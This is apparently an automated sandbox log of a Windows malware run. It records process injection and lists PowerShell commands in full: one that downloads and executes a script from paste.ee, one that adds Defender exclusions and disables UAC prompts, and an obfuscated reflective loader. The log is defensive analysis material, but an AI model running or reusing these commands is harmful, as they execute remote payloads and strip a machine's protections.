Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1550000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 14B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2C40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1120000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 3080000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2A20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: B70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 14E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\notepad.exe base: 1CB53D20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14F1CC80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1498BC10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 162FA3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BAD1DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 2BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D186B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E06B060000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 1090000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2592C8B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 162FA410000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\j3owB.exe "C:\ProgramData\j3owB.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\SVrB5SO0.exe "C:\ProgramData\SVrB5SO0.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\cZp98.exe "C:\ProgramData\cZp98.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ad169925-81d9-44d9-bcaf-9afe899a1c33}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass add-mppreference -exclusionpath $env:programdata, $env:temp, $env:homedrive; set-itemproperty -path "hklm:\software\microsoft\windows\currentversion\policies\system" -name "consentpromptbehavioradmin" -value 0 -type dword
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:khajdxumdnco{param([outputtype([type])][parameter(position=0)][type[]]$irkchjycpcihrg,[parameter(position=1)][type]$fkynkulovt)$wzapjwdxvrr=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+[char](102)+'l'+'e'+''+[char](99)+'t'+'e'+''+'d'+''+[char](68)+''+'e'+''+'l'+''+[char](101)+''+[char](103)+''+'a'+''+'t'+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+'e'+''+[char](109)+''+[char](111)+'r'+[char](121)+''+[char](77)+'o'+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+[char](121)+''+'d'+''+[char](101)+'le'+'g'+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+''+[char](121)+''+'p'+'e','cl'+[char](97)+'ss'+','+''+'p'+''+[char](117)+''+'b'+''+[char](108)+''+[char](105)+''+[char](99)+''+[char](44)+''+[char](83)+'ea'+[char](108)+''+[char](101)+''+'d'+','+[char](65)+''+[char](110)+''+[char](115)+''+[char](105)+''+'c'+'l'+[char](97)+''+'s'+''+'s'+','+[char](65)+''+'u'+'t'+[char](111)+''+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$wzapjwdxvrr.defineconstructor('r'+'t'+''+'s'+''+[char](112)+''+[char](101)+'c'+'i'+'a'+'l'+''+[char](78)+'a'+[char](109)+'e'+','+''+'h'+''+[char](105)+''+'d'+''+[char](101)+''+[char](66)+''+'y'+''+[char](83)+''+[char](105)+'g'+','+'p'+'u'+''+[char](98)+''+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$irkchjycpcihrg).setimplementationflags(''+[char](82)+''+'u'+''+[char](110)+''+[char](116)+''+[char](105)+''+'m'+''+[char](101)+''+[char](44)+''+[char](77)+'a'+'n'+''+[char](97)+''+[char](103)+''+'e'+'d');$wzapjwdxvrr.definemethod(''+'i'+''+[char](110)+''+[char](118)+''+'o'+'k'+[char](101)+'',''+'p'+''+[char](117)+''+[char](98)+''+[char](108)+'i'+'c'+''+[char](44)+'h'+[char](105)+''+[char](100)+''+[char](101)+'by'+[char](83)+'i'+'g'+''+','+''+'n'+''+[char](101)+''+'w'+''+[char](83)+''+'l'+'o'+[char](116)+''+[char](44)+''+'v'+'i'+'r'+''+'t'+'u'+[char](97)+''+'l'+'',$fkynkulovt,$irkchjycpcihrg).setimplementationflags(''+'r'+''+'u'+''+[char](110)+''+'t'+''+'i'+''+'m'+''+[char](101)+''+[char](44)+''+'m'+''+'a'+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+'d');write-output $wzapjwdxvrr.createtype();}$zlkqxzedqjghd=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+'y'+'s'+''+'t'+''+'e'+'m'+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')}).gettype(''+[char](77)+''+'i'+'c'+'r'+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+''+'t'+''+[char](46)+'w'+[char](105)+''+[char](110)+''+'3'+''+'2'+''+'.'+''+'u'+'ns'+'a'+''+'f'+''+[char](101)+''+[char](78)+'ati'+[char](118)+''+'e'+''+[char](77)+''+'e'+''+[char](116)+''+'h'+''+[char](111)+'d'+'s'+'');$inabadjdzoirzm=$zl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass add-mppreference -exclusionpath $env:programdata, $env:temp, $env:homedrive; set-itemproperty -path "hklm:\software\microsoft\windows\currentversion\policies\system" -name "consentpromptbehavioradmin" -value 0 -type dword	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 20_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

20_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 20_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

20_2_0000000140002300

Source: winlogon.exe, 00000015.00000000.1352914332.0000018AF9FD0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000002.2455327619.0000018AF9FD1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000000.1371904849.000001A523C60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: dwm.exe, 00000018.00000002.2532884303.000001A528524000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.1378282431.000001A528524000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000015.00000000.1352914332.0000018AF9FD0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000002.2455327619.0000018AF9FD1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000000.1371904849.000001A523C60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000015.00000000.1352914332.0000018AF9FD0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000002.2455327619.0000018AF9FD1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000000.1371904849.000001A523C60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000015.00000000.1352914332.0000018AF9FD0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000015.00000002.2455327619.0000018AF9FD1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000000.1371904849.000001A523C60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\notepad.exe

Code function: 2_3_000001CB53D331C0 cpuid

2_3_000001CB53D331C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\script.ps1 VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
